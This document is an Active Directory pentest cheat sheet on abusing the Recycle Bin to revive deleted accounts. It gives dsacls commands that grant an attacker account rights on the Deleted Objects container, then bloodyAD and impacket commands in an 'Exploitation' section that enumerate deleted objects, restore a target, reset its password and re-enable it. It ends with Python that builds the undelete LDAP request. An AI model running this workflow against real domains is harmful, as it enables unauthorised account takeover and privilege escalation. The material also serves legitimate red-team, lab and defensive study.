Active Directory Recycle Bin

Details

  • Deleted objects are kept for msDS-deletedObjectLifetime days; when that attribute is unset the value of tombstoneLifetime applies (180 days by default on forests created with Windows Server 2003 SP1 or later, 60 on older forests). After that the object becomes recycled and can no longer be restored.
  • Both lifetime attributes live on CN=Directory Service,CN=Windows NT,CN=Services,CN=Configuration,DC=example,DC=com. The deleted objects themselves sit in the hidden CN=Deleted Objects,DC=example,DC=com container of each naming context.

Enable Active Directory Recycle Bin in PowerShell

# Irreversible. Needs forest functional level Windows Server 2008 R2 or higher and Enterprise Admins rights;
# -Target is the forest root domain
Enable-ADOptionalFeature -Identity 'CN=Recycle Bin Feature,CN=Optional Features,CN=Directory Service,CN=Windows NT,CN=Services,CN=Configuration,DC=<Domain>,DC=<Domain>' -Scope ForestOrConfigurationSet -Target '<Domain>'

# Example
Enable-ADOptionalFeature -Identity 'CN=Recycle Bin Feature,CN=Optional Features,CN=Directory Service,CN=Windows NT,CN=Services,CN=Configuration,DC=sec,DC=lab' -Scope ForestOrConfigurationSet -Target 'sec.lab'

Granting a domain user rights on the Deleted Objects container

The common rights abbreviations defined in Microsoft's documentation (SDDL spelling; dsacls writes Generic Execute as GE and Self Write as WS) are:

  • GA:Generic All
  • GR:Generic Read
  • GW:Generic Write
  • GX:Generic Execute
  • RP:Read Property
  • WP:Write Property
  • CC:Create Child
  • DC:Delete Child
  • LC:List Children
  • DT:Delete Tree
  • LO:List Object
  • SD:Delete
  • RC:Read Control
  • WD:Write DACL
  • WO:Write Owner

Reference table

Code | Right           | Meaning                                        | Common qualified forms (WP/RP/CA)
GA   | Generic All     | Full control; includes every right             |
GR   | Generic Read    | Read all attributes and the permissions        |
GW   | Generic Write   | Modify all attributes                          |
GE   | Generic Execute | Read and list contents                         |
SD   | Delete          | Delete this object                             |
DT   | Delete Tree     | Delete the object and all of its children      |
RC   | Read Control    | Read the object's permission list (ACL)        |
WD   | Write DACL      | Modify the object's permission list (ACL)      |
WO   | Write Owner     | Change the object's owner                      |
LC   | List Contents   | See the names of the objects in a container    |
CC   | Create Child    | Create objects in a container (e.g. a user)    |
DC   | Delete Child    | Delete child objects of a container            |
RP   | Read Property   | Read an attribute                              | RP;memberOf (read group membership)
WP   | Write Property  | Write an attribute                             | WP;servicePrincipalName (change the SPN), WP;userAccountControl (change account state)
CA   | Control Access  | Extended right                                 | CA;Reset Password (reset the password), CA;Replicating Directory Changes (DCSync)
SW   | Self Write      | Validated write                                | SW;publicInformation (change personal information)

# Grant Create Child (CC) on the container or OU the object will be restored into
dsacls "CN=Users,DC=<Domain>,DC=<Domain>" /G "<Domain>\<Attacker>:CC"

# Grant write (full control here) on the user object. This is done before the object
# is deleted: with the Recycle Bin enabled a deleted object keeps its
# nTSecurityDescriptor, so the ACE survives the deletion
dsacls "CN=<Target>,CN=Users,DC=<Domain>,DC=<Domain>" /G "<Domain>\<Attacker>:GA"

# Take ownership of the Deleted Objects container so its DACL can be edited
# (its default DACL grants ordinary principals nothing)
dsacls "CN=Deleted Objects,DC=<Domain>,DC=<Domain>" /takeownership

# Grant the restore right (the Reanimate Tombstones extended right) on the domain
# naming-context head; this is the object the restore check is evaluated against
dsacls "DC=<Domain>,DC=<Domain>" /G "sec\ZZ:CA;Reanimate Tombstones;"
# The same grant on the Deleted Objects container
dsacls "CN=Deleted Objects,DC=<Domain>,DC=<Domain>" /G "sec\ZZ:CA;Reanimate Tombstones;"

# Grant list contents, read property and write property on the container
dsacls "CN=Deleted Objects,DC=<Domain>,DC=<Domain>" /G "sec\ZZ:LC"
dsacls "CN=Deleted Objects,DC=<Domain>,DC=<Domain>" /G "sec\ZZ:RP"
dsacls "CN=Deleted Objects,DC=<Domain>,DC=<Domain>" /G "sec\ZZ:WP"
# Or in one call
dsacls "CN=Deleted Objects,DC=<Domain>,DC=<Domain>" /G "sec\ZZ:LCRPWP"

Post-restore steps

# Reset the restored account's password (a reanimated tombstone comes back without a usable one)
impacket-changepasswd -altuser <Attacker> -altpass <Password> -newpass <New Password> -reset <Domain>/<Target>@<IP>

# Enable the account (clear the ACCOUNTDISABLE flag in userAccountControl)
bloodyAD -u <Username> -d <Domain> -p <Password> --host <IP> remove uac <Target> -f ACCOUNTDISABLE

# Collect the domain again with BloodHound to see what the restored account now reaches
bloodhound-python -c All -u <Username> -p <Password> -d <Domain> -ns <IP> -dc <DC> --zip --dns-tcp

bloodyAD

Install from GitHub:

# https://github.com/CravateRouge/bloodyAD
python3 -m venv /path/venv
source /path/venv/bin/activate
# Install from PyPI
pip install bloodyAD
# Or from source
git clone --depth 1 https://github.com/CravateRouge/bloodyAD
cd bloodyAD
pip install .

Restore Objects

Requirements:

  • The Reanimate Tombstones control-access right (shown as "Restore Tombstoned" in some tools) on the domain naming-context head (DC=...)
  • Generic Write (at least Write Property) on the deleted object itself
  • Create Child on the container or OU the object is restored into

By default, only Domain Admins are able to list and restore deleted objects.

What a restored object gets back depends on its state:

  • Deleted objects (Recycle Bin enabled, still within msDS-deletedObjectLifetime) retain all their attributes, including sensitive ones such as group memberships and the password hash
  • Tombstoned objects (Recycle Bin not enabled) retain only the tombstone-preserved attributes (objectGUID, objectSid, sAMAccountName, sIDHistory, nTSecurityDescriptor and a few more); a reanimated tombstone therefore needs the password reset and account-enable steps above
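The following Python is an added example (not from the original page, and not bloodyAD or dsacls code). It decodes the dsacls /G rights strings used in the table and commands above into the ACCESS_MASK bits that end up in the ACE, then applies the three restore requirements above to a set of grants. The DNs, the trustee sec\ZZ and the objectGUID in the deleted DN are constructed for the example; the mask bits, the generic-right mappings and the three rightsGuid values are the documented Active Directory values.

```python
"""Decode dsacls rights strings into AD ACCESS_MASK bits and check the
three rights a restore needs. Added example; standard library only."""
import uuid

# ACCESS_MASK bits for directory objects (MS-ADTS 5.1.3.2)
RIGHT_BITS = {
    "CC": 0x00000001,  # RIGHT_DS_CREATE_CHILD
    "DC": 0x00000002,  # RIGHT_DS_DELETE_CHILD
    "LC": 0x00000004,  # RIGHT_DS_LIST_CONTENTS
    "WS": 0x00000008,  # RIGHT_DS_WRITE_PROPERTY_EXTENDED (validated/self write)
    "RP": 0x00000010,  # RIGHT_DS_READ_PROPERTY
    "WP": 0x00000020,  # RIGHT_DS_WRITE_PROPERTY
    "DT": 0x00000040,  # RIGHT_DS_DELETE_TREE
    "LO": 0x00000080,  # RIGHT_DS_LIST_OBJECT
    "CA": 0x00000100,  # RIGHT_DS_CONTROL_ACCESS (extended rights)
    "SD": 0x00010000,  # DELETE
    "RC": 0x00020000,  # READ_CONTROL
    "WD": 0x00040000,  # WRITE_DAC
    "WO": 0x00080000,  # WRITE_OWNER
}
# SDDL spells two of the codes differently from dsacls
SDDL_ALIASES = {"GX": "GE", "SW": "WS"}
# Generic rights as the DSA maps them onto the specific bits
GENERIC = {
    "GR": RIGHT_BITS["RC"] | RIGHT_BITS["LC"] | RIGHT_BITS["RP"] | RIGHT_BITS["LO"],
    "GW": RIGHT_BITS["RC"] | RIGHT_BITS["WS"] | RIGHT_BITS["WP"],
    "GE": RIGHT_BITS["RC"] | RIGHT_BITS["LC"],
    "GA": sum(RIGHT_BITS.values()),
}
# rightsGuid of the extended rights the CA;...; grants above refer to
EXTENDED_RIGHTS = {
    "Reanimate Tombstones": uuid.UUID("45ec5156-db7e-47bb-b53f-dbeb2d03c40f"),
    "Reset Password": uuid.UUID("00299570-246d-11d0-a768-00aa006e0529"),
    "Replicating Directory Changes": uuid.UUID("1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"),
}


def decode_rights(codes: str) -> int:
    """'LCRPWP' -> 0x34; generic codes expand to their specific bits."""
    codes = codes.strip().upper()
    if len(codes) % 2:
        raise ValueError(f"rights must be two-letter codes: {codes!r}")
    mask = 0
    for i in range(0, len(codes), 2):
        code = SDDL_ALIASES.get(codes[i:i + 2], codes[i:i + 2])
        if code in GENERIC:
            mask |= GENERIC[code]
        elif code in RIGHT_BITS:
            mask |= RIGHT_BITS[code]
        else:
            raise ValueError(f"unknown rights code {code!r}")
    return mask


def parse_grant(spec: str):
    """Parse a dsacls /G value 'trustee:RIGHTS[;object;]'.
    'object' narrows the grant: an attribute for RP/WP, a class for CC/DC,
    or an extended right's display name for CA (mapped to its rightsGuid).
    Returns (trustee, mask, object), object being None when unqualified."""
    trustee, sep, perm = spec.partition(":")
    if not sep or not trustee or not perm:
        raise ValueError(f"expected trustee:RIGHTS, got {spec!r}")
    parts = perm.split(";")
    mask = decode_rights(parts[0])
    obj = parts[1].strip() if len(parts) > 1 and parts[1].strip() else None
    if obj is not None and mask & RIGHT_BITS["CA"]:
        if obj not in EXTENDED_RIGHTS:
            raise ValueError(f"unknown extended right {obj!r}")
        obj = EXTENDED_RIGHTS[obj]
    return trustee, mask, obj


def can_restore(grants, trustee, domain_dn, deleted_dn, target_dn):
    """grants: [(object_dn, dsacls_spec), ...]. Applies the three checks:
    Reanimate Tombstones on the NC head, write on the deleted object,
    Create Child on the container the object is restored into."""
    parsed = [(dn,) + parse_grant(spec) for dn, spec in grants]

    def has(dn, bit, needed_obj=None):
        for gdn, gtrustee, mask, obj in parsed:
            if gtrustee.lower() != trustee.lower() or gdn.lower() != dn.lower():
                continue
            # an unqualified grant covers every attribute / extended right
            if mask & bit and (obj is None or obj == needed_obj):
                return True
        return False

    return {
        "reanimate_on_domain": has(domain_dn, RIGHT_BITS["CA"],
                                   EXTENDED_RIGHTS["Reanimate Tombstones"]),
        "write_on_deleted_object": has(deleted_dn, RIGHT_BITS["WP"]),
        "create_child_on_target": has(target_dn, RIGHT_BITS["CC"]),
    }


# Constructed sample mirroring the dsacls lines above. The GA on the user was
# granted before deletion and survives because a Recycle Bin deleted object
# keeps its nTSecurityDescriptor. The objectGUID is made up.
DOMAIN_DN = "DC=sec,DC=lab"
DELETED_DN = ("CN=alice\\0ADEL:2f9f3d4e-0f2f-4a0a-9d7e-0c8b5e4a1b3c,"
              "CN=Deleted Objects,DC=sec,DC=lab")
SAMPLE_GRANTS = [
    (DOMAIN_DN, "sec\\ZZ:CA;Reanimate Tombstones;"),
    (DELETED_DN, "sec\\ZZ:GA"),
    ("CN=Deleted Objects,DC=sec,DC=lab", "sec\\ZZ:LCRPWP"),
    ("CN=Users,DC=sec,DC=lab", "sec\\ZZ:CC"),
]


def evaluate(grants=SAMPLE_GRANTS):
    return can_restore(grants, "sec\\ZZ", DOMAIN_DN, DELETED_DN, "CN=Users,DC=sec,DC=lab")


if __name__ == "__main__":
    for check, ok in evaluate().items():
        print(f"{check:26} {'OK' if ok else 'MISSING'}")
```

Note that the LCRPWP grant on the Deleted Objects container alone does not satisfy the second requirement: the write right has to be on the deleted object itself, which is why the example carries the GA placed on the user before it was deleted. Drop that grant from SAMPLE_GRANTS and write_on_deleted_object turns False while the other two checks still pass.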

Exploitation:

# Check whether the Recycle Bin is in use and what the Deleted Objects container's DACL grants.
# 1.2.840.113556.1.4.2064 is the LDAP_SERVER_SHOW_RECYCLED_OID control; the definitive indicator that
# the feature is enabled is the Recycle Bin Feature DN listed in msDS-EnabledFeature on CN=Partitions,CN=Configuration,...
bloodyAD -u <Username> -p <Password> -d <Domain> --host <IP> get search -c '1.2.840.113556.1.4.2064' --resolve-sd --attr nTSecurityDescriptor --base 'CN=Deleted Objects,DC=sec,DC=org' --filter "(objectClass=container)"

# Check whether the current account's rights meet the requirements
# No extra parameter is needed to see deleted objects; they are included by default
# --exclude-del  if set, exclude deleted objects (default: False)
bloodyAD -u <Username> -p <Password> -d <Domain> --host <IP> get writable

# List the deleted objects
bloodyAD -u <Username> -p <Password> -d <Domain> --host <IP> get search -c '1.2.840.113556.1.4.2064' --filter '(isDeleted=TRUE)' --attr name,objectSid

# Check whether we hold the rights to restore: the domain head (Reanimate Tombstones),
# the deleted object (write) and the destination container (Create Child)
bloodyAD -u <Username> -p <Password> -d <Domain> --host <IP> get object 'DC=sec,DC=org' --attr nTSecurityDescriptor --resolve-sd

bloodyAD -u <Username> -p <Password> -d <Domain> --host <IP> get search -c '1.2.840.113556.1.4.2064' --filter '(&(isDeleted=TRUE)(sAMAccountName=<Name>))' --attr nTSecurityDescriptor --resolve-sd

bloodyAD -u <Username> -p <Password> -d <Domain> --host <IP> get object 'CN=Users,DC=sec,DC=org' --attr nTSecurityDescriptor --resolve-sd

# Restore the deleted object
bloodyAD -u <Username> -p <Password> -d <Domain> --host <IP> set restore <Target Name/SID>
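What a restore sends on the wire, as an added example (not the page's own code and not bloodyAD's implementation): MS-ADTS describes the undelete as a single LDAP modify on the deleted object that removes isDeleted and replaces distinguishedName, carried with the Show Deleted Objects control. The Python below parses the mangled deleted-object DN, refuses recycled objects (which can no longer be reanimated), and builds that modify as plain data. The sample object's attributes and its objectGUID are constructed; the two control OIDs and the modify shape are the documented ones.

```python
"""Build the LDAP modify that reanimates a deleted AD object (MS-ADTS
'Undelete Operation'). Added example, standard library only; the request is
returned as plain data so it can be handed to any LDAP client."""
import re
from typing import Optional

SHOW_DELETED_OID = "1.2.840.113556.1.4.417"    # needed on the modify itself
SHOW_RECYCLED_OID = "1.2.840.113556.1.4.2064"  # what the searches above use

# Deleted-object RDN: '<attr>=<name>\0ADEL:<objectGUID>' (\0A is the escaped newline)
_DELETED_RDN = re.compile(
    r"^(?P<attr>[A-Za-z]+)=(?P<name>.+)\\0ADEL:(?P<guid>[0-9a-fA-F-]{36})$")


def parse_deleted_dn(dn: str):
    """Return (original_rdn, objectGUID, container) for a deleted-object DN.
    Assumes the RDN value contains no escaped commas."""
    rdn, sep, container = dn.partition(",")
    m = _DELETED_RDN.match(rdn)
    if not sep or not m or not container.lower().startswith("cn=deleted objects,"):
        raise ValueError(f"not a deleted-object DN: {dn!r}")
    return f"{m['attr']}={m['name']}", m["guid"].lower(), container


def build_restore_modify(obj: dict, target_container: Optional[str] = None,
                         new_rdn: Optional[str] = None) -> dict:
    """obj: attributes of the deleted object as a search returns them.
    The restore DN defaults to lastKnownParent; pass target_container to
    restore elsewhere (that container is the one the Create Child
    requirement applies to)."""
    if str(obj.get("isRecycled", "FALSE")).upper() == "TRUE":
        raise ValueError("object is recycled (past the deleted-object lifetime); cannot be reanimated")
    if str(obj.get("isDeleted", "FALSE")).upper() != "TRUE":
        raise ValueError("object is not deleted")
    rdn, _guid, _container = parse_deleted_dn(obj["distinguishedName"])
    parent = target_container or obj.get("lastKnownParent")
    if not parent:
        raise ValueError("no lastKnownParent on the object; pass target_container")
    new_dn = f"{new_rdn or rdn},{parent}"
    return {
        "dn": obj["distinguishedName"],
        "changes": [
            ("delete", "isDeleted", []),                  # clears the tombstone flag
            ("replace", "distinguishedName", [new_dn]),   # moves it back into the tree
        ],
        "controls": [(SHOW_DELETED_OID, True, None)],     # (oid, criticality, value)
    }


# Constructed sample: what a search with the show-recycled control returns for
# a user deleted while the Recycle Bin is enabled (objectGUID made up).
SAMPLE_DELETED_USER = {
    "distinguishedName": "CN=alice\\0ADEL:2f9f3d4e-0f2f-4a0a-9d7e-0c8b5e4a1b3c,"
                         "CN=Deleted Objects,DC=sec,DC=org",
    "isDeleted": "TRUE",
    "lastKnownParent": "CN=Users,DC=sec,DC=org",
    "sAMAccountName": "alice",
}


def restore_request(obj=SAMPLE_DELETED_USER, target_container=None):
    return build_restore_modify(obj, target_container)


if __name__ == "__main__":
    import json
    print(json.dumps(restore_request(), indent=2))
    print(json.dumps(restore_request(target_container="OU=Restored,DC=sec,DC=org"), indent=2))
```

With ldap3 the returned data maps directly onto conn.modify(req["dn"], {"isDeleted": [(MODIFY_DELETE, [])], "distinguishedName": [(MODIFY_REPLACE, [new_dn])]}, controls=req["controls"]); the DC evaluates the three rights from the requirements list against exactly these three objects, and refuses the modify if the new DN is already taken. Restoring into a different container than lastKnownParent is how an attacker with Create Child on only one OU still completes the restore.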